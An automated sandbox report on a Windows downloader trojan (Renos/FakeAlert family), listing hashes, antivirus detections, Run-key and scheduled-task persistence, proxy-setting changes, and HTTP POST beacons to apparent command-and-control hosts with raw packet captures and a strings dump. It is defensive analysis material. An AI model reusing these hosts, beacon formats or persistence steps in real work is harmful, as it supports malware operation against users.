Analysis Date: 2014-06-13 11:42:35
MD5: 4a98defe3e34fbc4a408a8e227ae0210
SHA1: 45cb6b22158ebe8901cd53e9b7c970040a5ae1c7

Static Details:

File type: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section CODE md5: 5784dae20cafcbaadcd8b70e59ba63bb sha1: 24f6c4532abdb27b640306ea99286323e858cbb3 size: 13824
Section DATA md5: a6ec4b249cf8d0f304c0ddd8e4953a55 sha1: f1b0c655d9903cbc9bd410e70f2058133c77eb22 size: 152576
Section BSS md5: d41d8cd98f00b204e9800998ecf8427e sha1: da39a3ee5e6b4b0d3255bfef95601890afd80709 size: 0
Section .idata md5: b94686157c362e1064997ba3a74c7bf4 sha1: df3e3125701266d72b3d890023b6e1e298a7a6d2 size: 1536
Section .edata md5: 9f2f69c0b89ae81467ec477a44814da0 sha1: 8544f18236cb6f5b6d740da1a0420be1e528f2ff size: 512
Section .reloc md5: 4e00a3a256e224a2c7259497734ff216 sha1: c9e93c6dff616795fd8bb8b35de011b156847f39 size: 512
Section .rsrc md5: 8359b413f1955241932c9f7cfc48f917 sha1: 2bddf61ed4e7e1ad6036c71ac60d2e04bf886d8a size: 1024
Timestamp: 1992-06-19 22:22:17
PEhash: e2e9b994914e1ea46bad10e0ff22bf5821f1a3ec
IMPhash: 0f13239fcb90722a0b38cfe05258a22f
AV 360 Safe: Gen:Trojan.Heur.Renos.kCW@cqZetpbc
AV 360 Safe: Gen:Trojan.Heur.Renos.kCW@cqZetpbc
AV Ad-Aware: Gen:Trojan.Heur.Renos.kCW@cqZetpbc
AV Ad-Aware: Gen:Trojan.Heur.Renos.kCW@cqZetpbc
AV Alwil (avast): Kryptik-BOC [Trj]
AV Alwil (avast): Kryptik-BOC [Trj]
AV Arcabit (arcavir): no_virus
AV Arcabit (arcavir): no_virus
AV Authentium: W32/FakeAlert.NH.gen!Eldorado
AV Authentium: W32/FakeAlert.NH.gen!Eldorado
AV Avira (antivir): TR/Crypt.XPACK.Gen2
AV Avira (antivir): TR/Crypt.XPACK.Gen2
AV CA (E-Trust Ino): Win32/FakeAlert.I!generic
AV CA (E-Trust Ino): Win32/FakeAlert.I!generic
AV CAT (quickheal): Trojan.Renos.PG
AV CAT (quickheal): Trojan.Renos.PG
AV ClamAV: Trojan.Agent-270755
AV ClamAV: Trojan.Agent-270755
AV Dr. Web: Trojan.DownLoader2.34358
AV Dr. Web: Trojan.DownLoader2.34358
AV Emsisoft: Gen:Trojan.Heur.Renos.kCW@cqZetpbc
AV Emsisoft: Gen:Trojan.Heur.Renos.kCW@cqZetpbc
AV Eset (nod32): Win32/Kryptik.MRH
AV Eset (nod32): Win32/Kryptik.MRH
AV Fortinet: W32/CodecPack.ATMJ!tr
AV Fortinet: W32/CodecPack.ATMJ!tr
AV Frisk (f-prot): W32/FakeAlert.NH.gen!Eldorado (generic, not disinfectable)
AV Frisk (f-prot): W32/FakeAlert.NH.gen!Eldorado (generic, not disinfectable)
AV F-Secure: Gen:Trojan.Heur.Renos.kCW@cqZetpbc
AV F-Secure: Gen:Trojan.Heur.Renos.kCW@cqZetpbc
AV Grisoft (avg): Generic22.FUO
AV Grisoft (avg): Generic22.FUO
AV Ikarus: Trojan-Downloader.Win32.Renos
AV Ikarus: Trojan-Downloader.Win32.Renos
AV Kaspersky: Trojan.Win32.Generic
AV Kaspersky: Trojan.Win32.Generic
AV MalwareBytes: no_virus
AV MalwareBytes: no_virus
AV Mcafee: Downloader-CEW.ak
AV Mcafee: Downloader-CEW.ak
AV Microsoft Security Essentials: TrojanDownloader:Win32/Renos.PG
AV Microsoft Security Essentials: TrojanDownloader:Win32/Renos.PG
AV MicroWorld (escan): Gen:Trojan.Heur.Renos.kCW@cqZetpbc
AV MicroWorld (escan): Gen:Trojan.Heur.Renos.kCW@cqZetpbc
AV Norman: winpe/Kryptik.NP
AV Norman: winpe/Kryptik.NP
AV Rising: no_virus
AV Rising: no_virus
AV Sophos: Mal/FakeAV-IV
AV Sophos: Mal/FakeAV-IV
AV Symantec: Trojan.Gen.2
AV Symantec: Trojan.Gen.2
AV Trend Micro: TROJ_KRYPTK.SMCA
AV Trend Micro: TROJ_KRYPTK.SMCA
AV VirusBlokAda (vba32): BScope.Trojan.PEH.0231

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

Creates Process: C:\malware.exe
Creates Mutex: Global\{F5CC5A0A-B9E5-411f-BF7E-EACE3BBC2BF1}
Creates Mutex: {A14B1A1D-023F-40dc-BBFE-208B1DAD2F82}

Process
↳ C:\malware.exe

Registry (Run key autostart entry): HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\0ESKOMO9JO ➝
C:\malware.exe
Registry: HKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝
NULL
Registry: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\\\x03\1601 ➝
NULL
Registry: HKEY_CURRENT_USER\Software\0ESKOMO9JO\OteH ➝
xC7aKZ+O6wyPlq1krRM4sG7m2LFGsYtHjHOagBf10Uk/n4gL8s8xs9LeD5KQVh3/j+XFa0mnr175UElKKyciA2gn6tUEA721Fj4P\\x00
Registry: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass ➝
1
Creates File (scheduled task file): C:\WINDOWS\Tasks\{22116563-108C-42c0-A7CE-60161B75E508}.job
Creates File: C:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates File: C:\Documents and Settings\Administrator\Cookies\index.dat
Creates File: PIPE\lsarpc
Creates File: \Device\Afd\Endpoint
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates Mutex: c:!documents and settings!administrator!local settings!history!history.ie5!
Creates Mutex: Global\{F5CC5A0A-B9E5-411f-BF7E-EACE3BBC2BF1}
Creates Mutex: WininetConnectionMutex
Creates Mutex: c:!documents and settings!administrator!cookies!
Creates Mutex: c:!documents and settings!administrator!local settings!temporary internet files!content.ie5!
Creates Mutex: {A14B1A1D-023F-40dc-BBFE-208B1DAD2F82}
Winsock DNS: lacvictoria.com
Winsock DNS: qqplot.com
Winsock DNS: 42.212.132.186

Network Details:

DNS: wsj.com
Type: A
205.203.132.1
DNS: wsj.com
Type: A
205.203.132.65
DNS: wsj.com
Type: A
205.203.140.1
DNS: wsj.com
Type: A
205.203.140.65
DNS: fastclick.com
Type: A
64.156.167.84
DNS: nifty.com
Type: A
210.131.4.217
DNS: qqplot.com
Type: A
109.74.195.149
DNS: bonreligion.com
Type: A
54.209.129.218
DNS: lacvictoria.com
Type: A
DNS: paulo-fg.com
Type: A
HTTP POST: http://qqplot.com/borders.php
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
HTTP POST: http://42.212.132.186/borders.php
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Flows TCP: 192.168.1.1:1031 ➝ 109.74.195.149:80
Flows TCP: 192.168.1.1:1032 ➝ 42.212.132.186:80

Raw Pcap
0x00000000 (00000)   504f5354 202f626f 72646572 732e7068   POST /borders.ph
0x00000010 (00016)   70204854 54502f31 2e310d0a 41636365   p HTTP/1.1..Acce
0x00000020 (00032)   70743a20 2a2f2a0d 0a436f6e 74656e74   pt: */*..Content
0x00000030 (00048)   2d547970 653a2061 70706c69 63617469   -Type: applicati
0x00000040 (00064)   6f6e2f78 2d777777 2d666f72 6d2d7572   on/x-www-form-ur
0x00000050 (00080)   6c656e63 6f646564 0d0a5573 65722d41   lencoded..User-A
0x00000060 (00096)   67656e74 3a204d6f 7a696c6c 612f342e   gent: Mozilla/4.
0x00000070 (00112)   30202863 6f6d7061 7469626c 653b204d   0 (compatible; M
0x00000080 (00128)   53494520 362e303b 2057696e 646f7773   SIE 6.0; Windows
0x00000090 (00144)   204e5420 352e3029 0d0a486f 73743a20    NT 5.0)..Host: 
0x000000a0 (00160)   7171706c 6f742e63 6f6d0d0a 436f6e74   qqplot.com..Cont
0x000000b0 (00176)   656e742d 4c656e67 74683a20 3334310d   ent-Length: 341.
0x000000c0 (00192)   0a436f6e 6e656374 696f6e3a 204b6565   .Connection: Kee
0x000000d0 (00208)   702d416c 6976650d 0a436163 68652d43   p-Alive..Cache-C
0x000000e0 (00224)   6f6e7472 6f6c3a20 6e6f2d63 61636865   ontrol: no-cache
0x000000f0 (00240)   0d0a0d0a 64617461 3d2f436a 45665a44   ....data=/CjEfZD
0x00000100 (00256)   53767871 43694b30 6c74554d 31757932   SvxqCiK0ltUM1uy2
0x00000110 (00272)   2f797534 55355970 4e6d3176 2f2f6a54   /yu4U5YpNm1v//jT
0x00000120 (00288)   6e675663 2b774d73 2b2b5a42 6a375a53   ngVc+wMs++ZBj7ZS
0x00000130 (00304)   59547233 69426b47 2f672b37 5643432f   YTr3iBkG/g+7VCC/
0x00000140 (00320)   31396b66 694f4870 37655263 48506959   19kfiOHp7eRcHPiY
0x00000150 (00336)   6f393930 4d55756a 67555734 62765449   o990MUujgUW4bvTI
0x00000160 (00352)   644e2f6a 50587547 506a6142 7a786c63   dN/jPXuGPjaBzxlc
0x00000170 (00368)   63356d70 4e303161 36742f51 69535858   c5mpN01a6t/QiSXX
0x00000180 (00384)   77707a39 486d306b 7a396642 6661556e   wpz9Hm0kz9fBfaUn
0x00000190 (00400)   3130782f 474c636f 66526948 344c7646   10x/GLcofRiH4LvF
0x000001a0 (00416)   73416947 59467361 696f4d57 30374b30   sAiGYFsaioMW07K0
0x000001b0 (00432)   4533726b 6b334d65 5a557967 44654c47   E3rkk3MeZUygDeLG
0x000001c0 (00448)   77327331 322b6f50 4d4e726e 4a5a637a   w2s12+oPMNrnJZcz
0x000001d0 (00464)   687a5a38 78694e57 75355467 4f687134   hzZ8xiNWu5TgOhq4
0x000001e0 (00480)   4f715553 30424d54 644b3262 5a792f68   OqUS0BMTdK2bZy/h
0x000001f0 (00496)   7833546e 6d477954 464c4868 4c635266   x3TnmGyTFLHhLcRf
0x00000200 (00512)   2b76417a 494f424e 6d763433 43444b32   +vAzIOBNmv43CDK2
0x00000210 (00528)   51303541 56636d41 38324b68 54665573   Q05AVcmA82KhTfUs
0x00000220 (00544)   732f476f 6c77786c 6d396b4c 6e726e6c   s/Golwxlm9kLnrnl
0x00000230 (00560)   49367034 366e3336 642f3334 6b705656   I6p46n36d/34kpVV
0x00000240 (00576)   32623651 672f413d 3d                  2b6Qg/A==

0x00000000 (00000)   504f5354 202f626f 72646572 732e7068   POST /borders.ph
0x00000010 (00016)   70204854 54502f31 2e310d0a 41636365   p HTTP/1.1..Acce
0x00000020 (00032)   70743a20 2a2f2a0d 0a436f6e 74656e74   pt: */*..Content
0x00000030 (00048)   2d547970 653a2061 70706c69 63617469   -Type: applicati
0x00000040 (00064)   6f6e2f78 2d777777 2d666f72 6d2d7572   on/x-www-form-ur
0x00000050 (00080)   6c656e63 6f646564 0d0a5573 65722d41   lencoded..User-A
0x00000060 (00096)   67656e74 3a204d6f 7a696c6c 612f342e   gent: Mozilla/4.
0x00000070 (00112)   30202863 6f6d7061 7469626c 653b204d   0 (compatible; M
0x00000080 (00128)   53494520 362e303b 2057696e 646f7773   SIE 6.0; Windows
0x00000090 (00144)   204e5420 352e3029 0d0a486f 73743a20    NT 5.0)..Host: 
0x000000a0 (00160)   34322e32 31322e31 33322e31 38360d0a   42.212.132.186..
0x000000b0 (00176)   436f6e74 656e742d 4c656e67 74683a20   Content-Length: 
0x000000c0 (00192)   3334310d 0a436f6e 6e656374 696f6e3a   341..Connection:
0x000000d0 (00208)   204b6565 702d416c 6976650d 0a436163    Keep-Alive..Cac
0x000000e0 (00224)   68652d43 6f6e7472 6f6c3a20 6e6f2d63   he-Control: no-c
0x000000f0 (00240)   61636865 0d0a0d0a 64617461 3d2f436a   ache....data=/Cj
0x00000100 (00256)   45665a44 53767871 43694b30 6c74554d   EfZDSvxqCiK0ltUM
0x00000110 (00272)   31757932 2f797534 55355970 4e6d3176   1uy2/yu4U5YpNm1v
0x00000120 (00288)   2f2f6a54 6e675663 2b774d73 2b2b5a42   //jTngVc+wMs++ZB
0x00000130 (00304)   6a375a53 59547233 69426b47 2f672b37   j7ZSYTr3iBkG/g+7
0x00000140 (00320)   5643432f 31396b66 694f4870 37655263   VCC/19kfiOHp7eRc
0x00000150 (00336)   48506959 6f393930 4d55756a 67555734   HPiYo990MUujgUW4
0x00000160 (00352)   62765449 644e2f6a 50587547 506a6142   bvTIdN/jPXuGPjaB
0x00000170 (00368)   7a786c63 63356d70 4e303161 36742f51   zxlcc5mpN01a6t/Q
0x00000180 (00384)   69535858 77707a39 486d306b 7a396642   iSXXwpz9Hm0kz9fB
0x00000190 (00400)   6661556e 3130782f 474c636f 66526948   faUn10x/GLcofRiH
0x000001a0 (00416)   344c7646 73416947 59467361 696f4d57   4LvFsAiGYFsaioMW
0x000001b0 (00432)   30374b30 4533726b 6b334d65 5a557967   07K0E3rkk3MeZUyg
0x000001c0 (00448)   44654c47 77327331 322b6f50 4d4e726e   DeLGw2s12+oPMNrn
0x000001d0 (00464)   4a5a637a 687a5a38 78694e57 75355467   JZczhzZ8xiNWu5Tg
0x000001e0 (00480)   4f687134 4f715553 30424d54 644b3262   Ohq4OqUS0BMTdK2b
0x000001f0 (00496)   5a792f68 7833546e 6d477954 464c4868   Zy/hx3TnmGyTFLHh
0x00000200 (00512)   4c635266 2b76417a 494f424e 6d763433   LcRf+vAzIOBNmv43
0x00000210 (00528)   43444b32 51303541 56636d41 38324b68   CDK2Q05AVcmA82Kh
0x00000220 (00544)   54665573 732f476f 6c77786c 6d396b4c   TfUss/Golwxlm9kL
0x00000230 (00560)   6e726e6c 49367034 366e3336 642f3334   nrnlI6p46n36d/34
0x00000240 (00576)   6b705656 32623651 672f413d 3d         kpVV2b6Qg/A==


Strings
u....A
.."
.IpTt
....
.g...n.F.Mo..HXh....s.o(n
a.Xq
.c.
J.0(..F..tu

0_GL
*}0K
0+[O:
1=# 
3(d9r\
4q7E
`;5guO
=5Wm
6A1z
/ 6j
6&`o
7K!b
7Q!a:
8QtE
ar=.
>?BJ
bmWo/
Bp.!
c2}u!
#cJd
E0y-
{E9{
:E~g
#f_*
FO^p
)f@z
G29y
G}e4o
h>QF
I{y&.
J+&:
jOP2
jV=x
KG6r
kpxA
}(.L
LDYj2"
l'e:
[O(&
p`1u
/@R;
rNG(
rQfS
rz3j?
sxOu
&.T]
t;98
U1cQ
^uB&{
ujnC
uV~]
W25`
WkX@D-
&&W/N'
W	QX
x0.	
(x,D
XNeY
XVP[
ycmQ
}Y	V
zA@t
0$1*1B2t4{4
0&3+31373
2&2.262>2F2N2V2^2f2n2v2~2
4&7-7@7
5#5)5/555;5A5G5M5S5Y5
676898c6
7D8L8U8
834140862
8#8/868<8F8L8T8Z8a8j8q8x8
[8q/-Qj
9"9)9E:
  </application> 
  <application> 
</assembly>
   <assemblyIdentity version="1.0.0.0" processorArchitecture="X86" name="Windows Setup UAC" type="win32"/>
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"> 
AssocQueryStringByKeyW
BCKABH8t$
BCKHJG:l$
Boolean
$B)%.z
]c8r+Yg
</compatibility> 
<compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1"> 
CreateWindowExA
DefineDosDeviceA
DialogBoxIndirectParamW
DisconnectNamedPipe
DispatchMessageA
.edata
EnumDateFormatsExW
EnumDesktopsA
ExtractAssociatedIconExW
F4U199
<?=F=Q=`=o=
ft%CJA
fweerthrtgr
*g44|`
GetCaretBlinkTime
GetConsoleTitleW
GetNumaAvailableMemoryNode
GetProcAddress
GetUserDefaultLCID
GlobalFix
HAK@:t$
HIAI8T$
.idata
IL}pH!
IMaaaK
JGG;t$
kernel32.dll
keybd_event
LoadLibraryA
LoadLibraryExA
LocalAlloc
LocalFree
lstrcmpiA
mouse_event
(|n,+++
OABH8\$
OpenAs_RunDLLW
PathRemoveArgsW
PathRemoveBackslashW
P.reloc
P.rsrc
ReadConsoleInputA
RemovePropA
            <requestedExecutionLevel level="highestAvailable"/> 
         </requestedPrivileges>
         <requestedPrivileges>
*>s+++
      </security>
      <security>
SetClassLongW
SetEndOfFile
SetEnvironmentVariableA
SetWindowsHookW
shell32.dll
SHEnumKeyExW
SHEnumValueW
SHGetNewLinkInfo
SHHelpShortcuts_RunDLLA
shlwapi.dll
StrCmpW
StrRStrIA
StrStrIA
StrToIntW
      <supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"/> 
      <supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"/> 
    <!--The ID below indicates application support for Windows 7 --> 
    <!--The ID below indicates application support for Windows Vista --> 
This program must be run under Win32
T$(I95
   </trustInfo>
      <trustInfo xmlns="urn:schemas-microsoft-com:asm.v3">
user32.dll
VerifyVersionInfoW
VirtualAllocEx
xmax.exe
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>